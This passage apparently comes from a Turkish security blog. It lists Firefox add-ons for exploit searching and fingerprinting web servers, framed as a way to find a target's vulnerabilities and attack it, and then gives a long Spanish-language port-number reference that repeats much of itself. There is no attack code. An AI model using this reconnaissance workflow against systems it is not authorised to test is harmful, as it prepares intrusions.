Bu araç ise son kullanıcı ağırlıklı bir araçtır. Bu araç tehlike içeren ve güvenilir olan siteleri gösterir. Aynı zamanda link koruması da mevcuttur bu şekilde gelen maillerin barındırdığı linkleri sizin için kontrol eder. Bu şekilde güvenli bir şekilde İnternet üzerinde dolaşmanızı sağlar. Bu aracın benzerleri de mevcuttur. Ama birinin ak dediğine diğeri kara diyebiliyor bu yüzden dikkatli olmak gerek.
https://addons.mozilla.org/en-US/firefox/addon/wot-safe-browsing-tool/
16. Exploit Search
Burada ise en çok kullanılan exploit arama araçları yer alıyor. Hepsini tek başlık altında yazmak istedim.
Packet Storm https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/
Exploit.db https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/
Security Focus https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
OSVDB https://addons.mozilla.org/en-us/firefox/addon/osvdb/
17. Wappalyzer
Bu araç ile sitelerin kullandığı uygulama ve yazılımları belirlemekte yardımcı olur. Bunlar öğrenilerek yukarıdaki araçlar ile ne tür zafiyetler olduğu araştırılabilir.
https://addons.mozilla.org/en-us/firefox/addon/wappalyzer/
18. Server Spy
Bu araç ise adından da belli olduğu gibi sunucu bilgisi gösterir. (Apache, ISS ) Web sunucu bilgileri de bizim için önemlidir. Çünkü hedef üzerinde sunucu zafiyetlerine göre çeşitli ataklar düzenleyebiliriz.
https://addons.mozilla.org/en-US/firefox/addon/server-spy/
24 Ocak 2016 Pazar
Port Numara Lİstesi
1 tcpmux Multiplexador de servicios de puertos TCP
5 rje Entrada de trabajo remota
7 echo Servicio echo
9 discard Servicio nulo para la evaluación de conexiones
11 systat Servicio de estado del sistema para listar los puertos conectados
13 daytime Envía la fecha y la hora al puerto solicitante
17 qotd Envía la cita del día al host conectado
18 msp Protocolo de envío de mensajes
19 chargen Servicio de generación de caracteres; envía flujos infinitos de caracteres
20 ftp-data Puerto de datos FTP
21 ftp Puerto del Protocolo de transferencia de archivos (FTP); algunas veces utilizado por el Protocolo de servicio de archivos
(FSP).
22 ssh Servicio de shell seguro (SSH)
23 telnet El servicio Telnet
25 smtp Protocolo simple de transferencia de correo (SMTP)
37 time Protocolo de hora (Time Protocol)
39 rlp Protocolo de ubicación de recursos
42 nameserver Servicio de nombres de Internet
43 nicname Servicio de directorio WHOIS
49 tacacs Terminal Access Controller Access Control System para el acceso y autenticación basado en TCP/IP
50 re-mail-ck Protocolo de verificación de correo remoto
53 domain Servicios de nombres de dominio (tales como BIND)
63 whois++ WHOIS++, Servicios extendidos WHOIS
67 bootps Servicios del Protocolo Bootstrap o de inicio (BOOTP); también usado por los servicios del protocolo de configuración
dinámica de host (DHCP).
68 bootpc Cliente bootstrap (BOOTP); también usado por el protocolo de configuración dinámica de host (DHCP)
69 tftp Protocolo de transferencia de archivos triviales (TFTP)
70 gopher Búsqueda y recuperación de documentos de Internet Gopher
71 netrjs-1 Servicio de trabajos remotos
72 netrjs-2 Servicio de trabajos remotos
73 netrjs-3 Servicio de trabajos remotos
73 netrjs-4 Servicio de trabajos remotos
79 finger Servicio Finger para información de contacto de usuarios
80 http Protocolo de transferencia de hipertexto (HTTP) para los servicios del World Wide Web (WWW)
88 kerberos Sistema de autenticación de redes Kerberos
95 supdup Extensión del protocolo Telnet
101 hostname Servicios de nombres de host en máquinas SRI-NIC
102/tcp iso-tsap Aplicaciones de redes del Entorno de desarrollo ISO (ISODE)
105 csnet-ns Servidor de nombres de mailbox; también usado por el servidor de nombres CSO
107 rtelnet Telnet remoto
109 pop2 Protocolo Post Office versión 2
110 pop3 Protocolo Post Office versión 3
111 sunrpc Protocolo de Llamadas de procedimientos remotos (RPC) para la ejecución de comandos remotos, utilizado por Sistemas de
archivos de red (Network Filesystem, NFS)
113 auth Protocolos de autenticación y Ident
115 sftp Servicios del protocolo de transferencia de archivos seguros (SFTP)
117 uucp-path Servicios de rutas de Unix-to-Unix Copy Protocol (UUCP)
119 nntp Protocolo de transferencia para los grupos de noticias de red (NNTP) para el sistema de discusiones USENET
123 ntp Protocolo de tiempo de red (NTP)
137 netbios-ns Servicios de nombres NETBIOS utilizados en Red Hat Enterprise Linux por Samba
138 netbios-dgm Servicios de datagramas NETBIOS utilizados en Red Hat Enterprise Linux por Samba
139 netbios-ssn Servicios de sesión NETBIOS utilizados en Red Hat Enterprise Linux por Samba
143 imap Protocolo de acceso a mensajes de Internet (IMAP)
161 snmp Protocolo simple de administración de redes (SNMP)
162 snmptrap Traps para SNMP
163 cmip-man Protocolo común de administración de la información (CMIP)
164 cmip-agent Protocolo común de administración de la información (CMIP)
174 mailq Cola de transporte de correos electrónicos MAILQ
177 xdmcp Protocolo de control del gestor de pantallas X (XDMCP)
178 nextstep Servidor de ventanas NeXTStep
179 bgp Border Gateway Protocol
191 prospero Servicios de sistemas de archivos distribuidos Prospero
194 irc Internet Relay Chat (IRC)
199 smux SNMP UNIX Multiplexer
201 at-rtmp Enrutamiento AppleTalk
202 at-nbp Enlace de nombres AppleTalk
204 at-echo Echo AppleTalk
206 at-zis Zona de información AppleTalk
209 qmtp Protocolo de transferencia rápida de correo (QMTP)
210 z39.50 Base de datos NISO Z39.50
213 ipx El protocolo de intercambio de paquetes entre redes (IPX), es un protocolo de datagramas usado comúnmente en ambientes
Novell Netware
220 imap3 Protocolo de acceso a mensajes de Internet versión 3
245 link Servicio LINK / 3-DNS iQuery
347 fatserv Servicio de administración de cintas y archivos FATMEN
363 rsvp_tunnel Túnel RSVP
369 rpc2portmap Portmapper del sistema de archivos Coda
370 codaauth2 Servicios de autenticación del sistema de archivos Coda
372 ulistproc UNIX LISTSERV
389 ldap Protocolo Lightweight de acceso a directorios (LDAP)
427 svrloc Protocolo de ubicación de servicios (SLP)
434 mobileip-agent Agente móvil del Protocolo Internet
435 mobilip-mn Gestor móvil del Protocolo Internet (IP)
443 https Protocolo de transferencia de hipertexto seguro (HTTP)
444 snpp Protocolo simple de Network Paging
445 microsoft-ds Bloque de mensajes de servidor (Server Message Block, SMB) sobre TCP/IP
464 kpasswd Servicios Kerberos de cambio de contraseñas y llaves
468 puertos Protocolo de gestión de llaves de sesiones Photuris
487 saft Protocolo simple de transferencia de archivos asíncrono (SAFT)
488 gss-http Servicios de seguridad genérica (GSS) para HTTP
496 pim-rp-disc Punto de descubrimiento rendezvous (RP-DISC) para servicios del protocolo de multidifusión independiente (PIM)
500 isakmp Protocolo de gestión de llaves y asociación de seguridad de Internet, Internet Security Association and Key Management
Protocol (ISAKMP)
535 iiop Internet Inter-Orb Protocol (IIOP)
538 gdomap GNUstep Distributed Objects Mapper (GDOMAP)
546 dhcpv6-client Cliente DHCP, Protocolo de configuración dinámica de host, versión 6
547 dhcpv6-server Servicio DHCP, protocolo de configuración dinámica de host, versión 6
554 puertos Protocolo de control de flujo de media en tiempo real (RTSP)
563 nntps Protocolo de transferencia para los grupos de noticias de red sobre Secure Sockets Layer (NNTPS)
565 whoami Listado de ID de usuarios de whoami
587 submission Agente de entrega de mensajes de correo (MSA)
610 npmp-local Protocolo de gestión de periféricos de red (NPMP) local / Sistema de colas distribuidas (DQS)
611 npmp-gui GUI del protocolo de gestión de periféricos de red (NPMP) / Sistema de colas distribuidas (DQS)
612 hmmp-ind HyperMedia Management Protocol (HMMP) Indication / DQS
631 ipp Protocolo de impresión de Internet (IPP)
636 ldaps Protocolo Lightweight de acceso a directorios sobre capas de enchufes seguras (LDAPS)
674 acap Protocolo de configuración de acceso a la aplicación (ACAP)
694 ha-cluster Servicios de latidos (heartbeat) para Clusters de alta disponibilidad
749 kerberos-adm Administración de base de datos Kerberos versión 5 (v5) 'kadmin'
750 kerberos-iv Servicios Kerberos versión 4 (v4)
765 webster Diccionario de red
767 phonebook Libreta de teléfonos de red
873 rsync Servicios de transferencia de archivos rsync
992 telnets Telnet sobre Capas de enchufes seguras (TelnetS)
993 imaps Protocolo de acceso a mensajes de Internet sobre Capas de enchufes seguras (IMAPS)
994 ircs Internet Relay Chat sobre Capas de enchufes seguras (IRCS)
995 pop3s Protocolo de oficina de correos versión 3 sobre Capa de enchufe segura (POP3S)
Puerto # / Capa Nombre Comentario
512/tcp exec Autenticación para la ejecución de procesos remotos
512/udp biff [comsat] Cliente de correo (biff) asíncrono y servicio (comsat)
513/tcp login Inicio de sesión remota (rlogin)
513/udp who [whod] demonio de conexión de usuarios whod
514/tcp shell [cmd] indicador de comandos shell remoto (rshell) y copy (rcp) remoto sin inicio de sesión
514/udp syslog Servicio de conexión al sistema UNIX
515 printer [spooler] Spooler de impresión en línea (lpr)
517/udp talk Servicio y cliente de llamada remota Talk
518/udp ntalk Servicio y cliente de llamada remota de red, Network talk (ntalk)
519 utime [unixtime] Protocolo de tiempo UNIX (utime)
520/tcp efs Servidor de nombres de archivos extendido (EFS)
520/udp router [route, routed] Protocolo de información de enrutamiento (RIP)
521 ripng Protocolo de información de enrutamiento para el Protocolo Internet versión 6 (IPv6)
525 timed [timeserver] Demonio de tiempo (timed)
526/tcp tempo [newdate] Tempo
530/tcp courier [rpc] Protocolo de Llamadas de procedimiento remotas (RPC)
531/tcp conference [chat] Internet Relay Chat
532 netnews Servicio de noticias Netnews
533/udp netwall Netwall para difusiones de emergencia
540/tcp uucp [uucpd] Servicios de copia UNIX-to-UNIX
543/tcp klogin Inicio de sesión remota Kerberos versión 5 (v5)
544/tcp kshell Intérprete de comandos Kerberos versión 5 (v5)
548 afpovertcp Appletalk Filing Protocol (AFP) sobre el Protocolo de control de transmisión (TCP)
556 remotefs [rfs_server, rfs] Sistema de archivos Brunhoff (RFS)
Puerto # / Capa Nombre Comentario
1080 socks Servicios proxy de aplicaciones de red SOCKS
1236 bvcontrol [rmtcfg] Servidor de configuración remota para switches de red Garcilis Packeten[a]
1300 h323hostcallsc Telecomunicación de llamadas a host seguras H.323
1433 ms-sql-s Microsoft SQL Server
1434 ms-sql-m Microsoft SQL Monitor
1494 ica Cliente Citrix ICA
1512 wins Microsoft Windows Internet Name Server
1524 ingreslock Servicios de bloqueo de sistemas de administración de bases de datos Ingres (DBMS)
1525 prospero-np Prospero sin privilegios
1645 datametrics [old-radius] Entrada Datametrics / old radius
1646 sa-msg-port [oldradacct] Entrada sa-msg-port / old radacct
1649 kermit Servicio de administración y transferencia de archivos Kermit
1701 l2tp [l2f] Protocolo de túnel de capa dos (LT2P) / Reenvío de capa dos (L2F)
1718 h323gatedisc Descubrimiento de portero de telecomunicaciones H.323
1719 h323gatestat Estado del portero de telecomunicaciones H.323
1720 h323hostcall Configuración de llamadas a host H.323
1758 tftp-mcast Multidifusión FTP Trivial
1759/udp mtftp Multidifusión FTP Trivial (MTFTP)
1789 hello protocolo de comunicación de enrutadores Hello
1812 radius Servicios de contabilidad y autenticación de marcado Radius
1813 radius-acct Contabilidad Radius
1911 mtp Protocolo de transporte multimedia Starlight Networks (MTP)
1985 hsrp Protocolo de enrutador Cisco Hot Standby
1986 licensedaemon Demonio de gestión de licencias Cisco
1997 gdp-port Protocolo de descubrimiento de puertas de enlace Cisco (GDP)
2049 nfs [nfsd] Sistema de archivos de red (NFS)
2102 zephyr-srv Servidor de mensajería distribuido Zephyr
2103 zephyr-clt Cliente Zephyr
2104 zephyr-hm Administrador de host Zephyr
2401 cvspserver Operaciones cliente/servidor del Sistema de versiones concurrente (CVS)
2430/tcp venus Administrador de caché Venus para el sistema de archivos Coda (puerto codacon)
2430/udp venus Administrador de caché Venus para el sistema de archivos Coda (callback/wbc interface)
2431/tcp venus-se Efectos secundarios para el protocolo de control de transmisión Venus (TCP)
2431/udp venus-se Efectos secundarios del Protocolo de datagrama de usuario Venus (UDP)
2432/udp codasrv Puerto del servidor del sistema de archivos Coda
2433/tcp codasrv-se Efectos secundarios TCP del sistema de archivos Coda
2433/udp codasrv-se Efectos secundarios UDP SFTP del sistema de archivos Coda
2600 hpstgmgr [zebrasrv] Enrutamiento Zebra
2601 discp-client [zebra] Cliente discp; indicador de comandos Zebra integrado
2602 discp-server [ripd] Servidor discp; demonio del Protocolo de información de enrutamiento (ripd)
2603 servicemeter [ripngd] Medidor de servicios; demonio RIP para IPv6
2604 nsc-ccs [ospfd] NSC CCS; demonio Open Shortest Path First (ospfd)
2605 nsc-posa NSC POSA; demonio del protocolo Border Gateway (bgpd)
2606 netmon [ospf6d] Dell Netmon; OSPF para el demonio IPv6 (ospf6d)
2809 corbaloc Localizador de servicio de nombres Common Object Request Broker Architecture (CORBA)
3130 icpv2 Protocolo caché Internet versión 2 (v2); utilizado por el servidor de caché Squid Proxy
3306 mysql Servicio de base de datos MySQL
3346 trnsprntproxy Proxy transparente
4011 pxe Servicio del Entorno de pre-ejecución (PXE)
4321 rwhois Servicio Whois (rwhois) remoto
4444 krb524 Traductor de tickets Kerberos versión 5 (v5) a la versión 4 (v4)
5002 rfe Sistema de difusión de audio Radio Free Ethernet (RFE)
5308 cfengine Máquina de configuración (Cfengine)
5999 cvsup [CVSup] Herramienta de transferencia de archivos y actualización CVSup
6000/tcp x11 [X] Servicios del Sistema X Window
7000 afs3-fileserver Servidor de archivos Andrew File System (AFS)
7001 afs3-callback Puerto AFS para las llamadas al gestor de caché
7002 afs3-prserver Base de datos de usuarios y grupos AFS
7003 afs3-vlserver Base de datos AFS de ubicación de volumen
7004 afs3-kaserver Servicio de autenticación AFS Kerberos
7005 afs3-volser Servidor de administración de volumen AFS
7006 afs3-errors Servicio de interpretación de errores AFS
7007 afs3-bos Proceso supervisor básico AFS
7008 afs3-update Actualizador servidor-a-servidor AFS
7009 afs3-rmtsys Servicio gestor de caché remoto AFS
9876 sd Sesión Director para conferencias de multidifusión IP
10080 amanda Servicios de respaldo Advanced Maryland Automatic Network Disk Archiver (Amanda)
11371 pgpkeyserver Servidor de llaves públicas Pretty Good Privacy (PGP) / GNU Privacy Guard (GPG)
11720 h323callsigalt Señal alterna de llamada H.323
13720 bprd Demonio de peticiones Veritas NetBackup (bprd)
13721 bpdbm Administrador de bases de datos Veritas NetBackup (bpdbm)
13722 bpjava-msvc Protocolo Veritas NetBackup Java / Protocolo Microsoft Visual C++ (MSVC)
13724 vnetd Utilidad de redes Veritas
13782 bpcd Veritas NetBackup
13783 vopied Demonio de autenticación Veritas VOPIE
22273 wnn6 [wnn4] Sistema de conversión Kana/Kanji[c]
26000 quake Servidores de juegos de múltiples jugadores Quake (y relacionados)
26208 wnn6-ds Servidor Wnn6 Kana/Kanji
33434 traceroute Herramienta de localización de rutas de red Traceroute
Puerto # / Capa Nombre Comentario
1/ddp rtmp Protocolo de administración de tablas de enrutamiento
2/ddp nbp Protocolo de enlace de nombres
4/ddp echo Protocolo Echo de AppleTalk
6/ddp zip Protocolo de información de zona
Puerto # / Capa Nombre Comentario
751 kerberos_master Autenticación Kerberos
752 passwd_server Servidor de contraseñas Kerberos (kpasswd)
754 krb5_prop Propagación de esclavos Kerberos v5
760 krbupdate [kreg] Registro Kerberos
1109 kpop Protocolo de oficina de correo Kerberos (KPOP)
2053 knetd De-multiplexor Kerberos
2105 eklogin Inicio de sesión remota encriptada Kerberos v5 (rlogin)
Puerto # / Capa Nombre Comentario
15/tcp netstat Network Status (netstat)
98/tcp linuxconf Herramienta de administración de Linux Linuxconf
106 poppassd Demonio de cambio de contraseñas del protocolo de oficina de correos (POPPASSD)
465/tcp smtps Protocolo simple de transferencia de correo sobre Capas Segura (SMTPS)
616/tcp gii Interfaz interactiva Gated (demonio de enrutamiento)
808 omirr [omirrd] Servicios de espejos de archivos Online Mirror (Omirr)
871/tcp supfileserv Servidor del Protocolo de actualización de software (SUP)
901/tcp swat Herramienta de administración Web de Samba (SWAT)
953 rndc Herramienta de configuración remota del Berkeley Internet Name Domain versión 9 (BIND 9)
1127/tcp supfiledbg Depuración del Protocolo de actualización de software (SUP)
1178/tcp skkserv Servidor de entrada de Japonés Simple Kana to Kanji (SKK)
1313/tcp xtel Sistema de información de texto French Minitel
1529/tcp support [prmsd, gnatsd] Sistema de seguimiento de errores GNATS
2003/tcp cfinger GNU Finger
2150 ninstall Servicio de instalación de redes
2988 afbackup Sistema de respaldo cliente-servidor afbackup
3128/tcp squid Caché proxy Web Squid
3455 prsvp Puerto RSVP
5432 postgres Base de datos PostgreSQL
4557/tcp fax Servicio de transmisión de FAX (servicio antiguo)
4559/tcp hylafax Protocolo cliente-servidor HylaFAX (nuevo servicio)
5232 sgi-dgl Biblioteca de gráficos distribuidos SGI
5354 noclog Demonio de conexión del centro de operaciones de redes NOCOL (noclogd)
5355 hostmon Monitoreo de host del centro de operaciones de redes NOCOL
5680/tcp canna Interfaz de entrada de caracteres Canna Japanese
6010/tcp x11-ssh-offset Offset del reenvío X11 de Shell seguro (SSH)
6667 ircd Demonio del Internet Relay Chat (ircd)
7100/tcp xfs Servidor de fuentes tipográficas de X (XFS)
7666/tcp tircproxy Servicio proxy Tircproxy IRC
8008 http-alt Protocolo de transferencia de hipertexto (HTTP) alterno
8080 webcache Servicio de caché del World Wide Web (WWW)
8081 tproxy Proxy transparente
9100/tcp jetdirect [laserjet, hplj] Servicio de impresión de redes Hewlett-Packard (HP) JetDirect
9359 mandelspawn [mandelbrot] Programa de spawning Parallel Mandelbrot para el Sistema X Window
10081 kamanda Servicio de respaldo Amanda sobre Kerberos
10082/tcp amandaidx Servidor de índices Amanda
10083/tcp amidxtape Servidor de cintas Amanda
20011 isdnlog Sistema de inicio de sesión de Red digital de servicios integrados (RDSI)
20012 vboxd Demonio RDSI voice box (vboxd)
22305/tcp wnn4_Kr Sistema de entrada kWnn Korean
22289/tcp wnn4_Cn Sistema de entradas cWnn Chinese
22321/tcp wnn4_Tw Sistema de entradas tWnn Chinese (Taiwan)
24554 binkp Demonio de correo Binkley TCP/IP Fidonet
27374 asp Protocolo de búsqueda de direcciones
60177 tfido Servicio de correo compatible Ifmail FidoNet
60179 fido Red de noticias y correo electrónico FidoNet
5 rje Entrada de trabajo remota
7 echo Servicio echo
9 discard Servicio nulo para la evaluación de conexiones
11 systat Servicio de estado del sistema para listar los puertos conectados
13 daytime Envía la fecha y la hora al puerto solicitante
17 qotd Envía la cita del día al host conectado
18 msp Protocolo de envío de mensajes
19 chargen Servicio de generación de caracteres; envía flujos infinitos de caracteres
20 ftp-data Puerto de datos FTP
21 ftp Puerto del Protocolo de transferencia de archivos (FTP); algunas veces utilizado por el Protocolo de servicio de archivos
(FSP).
22 ssh Servicio de shell seguro (SSH)
23 telnet El servicio Telnet
25 smtp Protocolo simple de transferencia de correo (SMTP)
37 time Protocolo de hora (Time Protocol)
39 rlp Protocolo de ubicación de recursos
42 nameserver Servicio de nombres de Internet
43 nicname Servicio de directorio WHOIS
49 tacacs Terminal Access Controller Access Control System para el acceso y autenticación basado en TCP/IP
50 re-mail-ck Protocolo de verificación de correo remoto
53 domain Servicios de nombres de dominio (tales como BIND)
63 whois++ WHOIS++, Servicios extendidos WHOIS
67 bootps Servicios del Protocolo Bootstrap o de inicio (BOOTP); también usado por los servicios del protocolo de configuración
dinámica de host (DHCP).
68 bootpc Cliente bootstrap (BOOTP); también usado por el protocolo de configuración dinámica de host (DHCP)
69 tftp Protocolo de transferencia de archivos triviales (TFTP)
70 gopher Búsqueda y recuperación de documentos de Internet Gopher
71 netrjs-1 Servicio de trabajos remotos
72 netrjs-2 Servicio de trabajos remotos
73 netrjs-3 Servicio de trabajos remotos
73 netrjs-4 Servicio de trabajos remotos
79 finger Servicio Finger para información de contacto de usuarios
80 http Protocolo de transferencia de hipertexto (HTTP) para los servicios del World Wide Web (WWW)
88 kerberos Sistema de autenticación de redes Kerberos
95 supdup Extensión del protocolo Telnet
101 hostname Servicios de nombres de host en máquinas SRI-NIC
102/tcp iso-tsap Aplicaciones de redes del Entorno de desarrollo ISO (ISODE)
105 csnet-ns Servidor de nombres de mailbox; también usado por el servidor de nombres CSO
107 rtelnet Telnet remoto
109 pop2 Protocolo Post Office versión 2
110 pop3 Protocolo Post Office versión 3
111 sunrpc Protocolo de Llamadas de procedimientos remotos (RPC) para la ejecución de comandos remotos, utilizado por Sistemas de
archivos de red (Network Filesystem, NFS)
113 auth Protocolos de autenticación y Ident
115 sftp Servicios del protocolo de transferencia de archivos seguros (SFTP)
117 uucp-path Servicios de rutas de Unix-to-Unix Copy Protocol (UUCP)
119 nntp Protocolo de transferencia para los grupos de noticias de red (NNTP) para el sistema de discusiones USENET
123 ntp Protocolo de tiempo de red (NTP)
137 netbios-ns Servicios de nombres NETBIOS utilizados en Red Hat Enterprise Linux por Samba
138 netbios-dgm Servicios de datagramas NETBIOS utilizados en Red Hat Enterprise Linux por Samba
139 netbios-ssn Servicios de sesión NETBIOS utilizados en Red Hat Enterprise Linux por Samba
143 imap Protocolo de acceso a mensajes de Internet (IMAP)
161 snmp Protocolo simple de administración de redes (SNMP)
162 snmptrap Traps para SNMP
163 cmip-man Protocolo común de administración de la información (CMIP)
164 cmip-agent Protocolo común de administración de la información (CMIP)
174 mailq Cola de transporte de correos electrónicos MAILQ
177 xdmcp Protocolo de control del gestor de pantallas X (XDMCP)
178 nextstep Servidor de ventanas NeXTStep
179 bgp Border Gateway Protocol
191 prospero Servicios de sistemas de archivos distribuidos Prospero
194 irc Internet Relay Chat (IRC)
199 smux SNMP UNIX Multiplexer
201 at-rtmp Enrutamiento AppleTalk
202 at-nbp Enlace de nombres AppleTalk
204 at-echo Echo AppleTalk
206 at-zis Zona de información AppleTalk
209 qmtp Protocolo de transferencia rápida de correo (QMTP)
210 z39.50 Base de datos NISO Z39.50
213 ipx El protocolo de intercambio de paquetes entre redes (IPX), es un protocolo de datagramas usado comúnmente en ambientes
Novell Netware
220 imap3 Protocolo de acceso a mensajes de Internet versión 3
245 link Servicio LINK / 3-DNS iQuery
347 fatserv Servicio de administración de cintas y archivos FATMEN
363 rsvp_tunnel Túnel RSVP
369 rpc2portmap Portmapper del sistema de archivos Coda
370 codaauth2 Servicios de autenticación del sistema de archivos Coda
372 ulistproc UNIX LISTSERV
389 ldap Protocolo Lightweight de acceso a directorios (LDAP)
427 svrloc Protocolo de ubicación de servicios (SLP)
434 mobileip-agent Agente móvil del Protocolo Internet
435 mobilip-mn Gestor móvil del Protocolo Internet (IP)
443 https Protocolo de transferencia de hipertexto seguro (HTTP)
444 snpp Protocolo simple de Network Paging
445 microsoft-ds Bloque de mensajes de servidor (Server Message Block, SMB) sobre TCP/IP
464 kpasswd Servicios Kerberos de cambio de contraseñas y llaves
468 puertos Protocolo de gestión de llaves de sesiones Photuris
487 saft Protocolo simple de transferencia de archivos asíncrono (SAFT)
488 gss-http Servicios de seguridad genérica (GSS) para HTTP
496 pim-rp-disc Punto de descubrimiento rendezvous (RP-DISC) para servicios del protocolo de multidifusión independiente (PIM)
500 isakmp Protocolo de gestión de llaves y asociación de seguridad de Internet, Internet Security Association and Key Management
Protocol (ISAKMP)
535 iiop Internet Inter-Orb Protocol (IIOP)
538 gdomap GNUstep Distributed Objects Mapper (GDOMAP)
546 dhcpv6-client Cliente DHCP, Protocolo de configuración dinámica de host, versión 6
547 dhcpv6-server Servicio DHCP, protocolo de configuración dinámica de host, versión 6
554 puertos Protocolo de control de flujo de media en tiempo real (RTSP)
563 nntps Protocolo de transferencia para los grupos de noticias de red sobre Secure Sockets Layer (NNTPS)
565 whoami Listado de ID de usuarios de whoami
587 submission Agente de entrega de mensajes de correo (MSA)
610 npmp-local Protocolo de gestión de periféricos de red (NPMP) local / Sistema de colas distribuidas (DQS)
611 npmp-gui GUI del protocolo de gestión de periféricos de red (NPMP) / Sistema de colas distribuidas (DQS)
612 hmmp-ind HyperMedia Management Protocol (HMMP) Indication / DQS
631 ipp Protocolo de impresión de Internet (IPP)
636 ldaps Protocolo Lightweight de acceso a directorios sobre capas de enchufes seguras (LDAPS)
674 acap Protocolo de configuración de acceso a la aplicación (ACAP)
694 ha-cluster Servicios de latidos (heartbeat) para Clusters de alta disponibilidad
749 kerberos-adm Administración de base de datos Kerberos versión 5 (v5) 'kadmin'
750 kerberos-iv Servicios Kerberos versión 4 (v4)
765 webster Diccionario de red
767 phonebook Libreta de teléfonos de red
873 rsync Servicios de transferencia de archivos rsync
992 telnets Telnet sobre Capas de enchufes seguras (TelnetS)
993 imaps Protocolo de acceso a mensajes de Internet sobre Capas de enchufes seguras (IMAPS)
994 ircs Internet Relay Chat sobre Capas de enchufes seguras (IRCS)
995 pop3s Protocolo de oficina de correos versión 3 sobre Capa de enchufe segura (POP3S)
Puerto # / Capa Nombre Comentario
512/tcp exec Autenticación para la ejecución de procesos remotos
512/udp biff [comsat] Cliente de correo (biff) asíncrono y servicio (comsat)
513/tcp login Inicio de sesión remota (rlogin)
513/udp who [whod] demonio de conexión de usuarios whod
514/tcp shell [cmd] indicador de comandos shell remoto (rshell) y copy (rcp) remoto sin inicio de sesión
514/udp syslog Servicio de conexión al sistema UNIX
515 printer [spooler] Spooler de impresión en línea (lpr)
517/udp talk Servicio y cliente de llamada remota Talk
518/udp ntalk Servicio y cliente de llamada remota de red, Network talk (ntalk)
519 utime [unixtime] Protocolo de tiempo UNIX (utime)
520/tcp efs Servidor de nombres de archivos extendido (EFS)
520/udp router [route, routed] Protocolo de información de enrutamiento (RIP)
521 ripng Protocolo de información de enrutamiento para el Protocolo Internet versión 6 (IPv6)
525 timed [timeserver] Demonio de tiempo (timed)
526/tcp tempo [newdate] Tempo
530/tcp courier [rpc] Protocolo de Llamadas de procedimiento remotas (RPC)
531/tcp conference [chat] Internet Relay Chat
532 netnews Servicio de noticias Netnews
533/udp netwall Netwall para difusiones de emergencia
540/tcp uucp [uucpd] Servicios de copia UNIX-to-UNIX
543/tcp klogin Inicio de sesión remota Kerberos versión 5 (v5)
544/tcp kshell Intérprete de comandos Kerberos versión 5 (v5)
548 afpovertcp Appletalk Filing Protocol (AFP) sobre el Protocolo de control de transmisión (TCP)
556 remotefs [rfs_server, rfs] Sistema de archivos Brunhoff (RFS)
Puerto # / Capa Nombre Comentario
1080 socks Servicios proxy de aplicaciones de red SOCKS
1236 bvcontrol [rmtcfg] Servidor de configuración remota para switches de red Garcilis Packeten[a]
1300 h323hostcallsc Telecomunicación de llamadas a host seguras H.323
1433 ms-sql-s Microsoft SQL Server
1434 ms-sql-m Microsoft SQL Monitor
1494 ica Cliente Citrix ICA
1512 wins Microsoft Windows Internet Name Server
1524 ingreslock Servicios de bloqueo de sistemas de administración de bases de datos Ingres (DBMS)
1525 prospero-np Prospero sin privilegios
1645 datametrics [old-radius] Entrada Datametrics / old radius
1646 sa-msg-port [oldradacct] Entrada sa-msg-port / old radacct
1649 kermit Servicio de administración y transferencia de archivos Kermit
1701 l2tp [l2f] Protocolo de túnel de capa dos (LT2P) / Reenvío de capa dos (L2F)
1718 h323gatedisc Descubrimiento de portero de telecomunicaciones H.323
1719 h323gatestat Estado del portero de telecomunicaciones H.323
1720 h323hostcall Configuración de llamadas a host H.323
1758 tftp-mcast Multidifusión FTP Trivial
1759/udp mtftp Multidifusión FTP Trivial (MTFTP)
1789 hello protocolo de comunicación de enrutadores Hello
1812 radius Servicios de contabilidad y autenticación de marcado Radius
1813 radius-acct Contabilidad Radius
1911 mtp Protocolo de transporte multimedia Starlight Networks (MTP)
1985 hsrp Protocolo de enrutador Cisco Hot Standby
1986 licensedaemon Demonio de gestión de licencias Cisco
1997 gdp-port Protocolo de descubrimiento de puertas de enlace Cisco (GDP)
2049 nfs [nfsd] Sistema de archivos de red (NFS)
2102 zephyr-srv Servidor de mensajería distribuido Zephyr
2103 zephyr-clt Cliente Zephyr
2104 zephyr-hm Administrador de host Zephyr
2401 cvspserver Operaciones cliente/servidor del Sistema de versiones concurrente (CVS)
2430/tcp venus Administrador de caché Venus para el sistema de archivos Coda (puerto codacon)
2430/udp venus Administrador de caché Venus para el sistema de archivos Coda (callback/wbc interface)
2431/tcp venus-se Efectos secundarios para el protocolo de control de transmisión Venus (TCP)
2431/udp venus-se Efectos secundarios del Protocolo de datagrama de usuario Venus (UDP)
2432/udp codasrv Puerto del servidor del sistema de archivos Coda
2433/tcp codasrv-se Efectos secundarios TCP del sistema de archivos Coda
2433/udp codasrv-se Efectos secundarios UDP SFTP del sistema de archivos Coda
2600 hpstgmgr [zebrasrv] Enrutamiento Zebra
2601 discp-client [zebra] Cliente discp; indicador de comandos Zebra integrado
2602 discp-server [ripd] Servidor discp; demonio del Protocolo de información de enrutamiento (ripd)
2603 servicemeter [ripngd] Medidor de servicios; demonio RIP para IPv6
2604 nsc-ccs [ospfd] NSC CCS; demonio Open Shortest Path First (ospfd)
2605 nsc-posa NSC POSA; demonio del protocolo Border Gateway (bgpd)
2606 netmon [ospf6d] Dell Netmon; OSPF para el demonio IPv6 (ospf6d)
2809 corbaloc Localizador de servicio de nombres Common Object Request Broker Architecture (CORBA)
3130 icpv2 Protocolo caché Internet versión 2 (v2); utilizado por el servidor de caché Squid Proxy
3306 mysql Servicio de base de datos MySQL
3346 trnsprntproxy Proxy transparente
4011 pxe Servicio del Entorno de pre-ejecución (PXE)
4321 rwhois Servicio Whois (rwhois) remoto
4444 krb524 Traductor de tickets Kerberos versión 5 (v5) a la versión 4 (v4)
5002 rfe Sistema de difusión de audio Radio Free Ethernet (RFE)
5308 cfengine Máquina de configuración (Cfengine)
5999 cvsup [CVSup] Herramienta de transferencia de archivos y actualización CVSup
6000/tcp x11 [X] Servicios del Sistema X Window
7000 afs3-fileserver Servidor de archivos Andrew File System (AFS)
7001 afs3-callback Puerto AFS para las llamadas al gestor de caché
7002 afs3-prserver Base de datos de usuarios y grupos AFS
7003 afs3-vlserver Base de datos AFS de ubicación de volumen
7004 afs3-kaserver Servicio de autenticación AFS Kerberos
7005 afs3-volser Servidor de administración de volumen AFS
7006 afs3-errors Servicio de interpretación de errores AFS
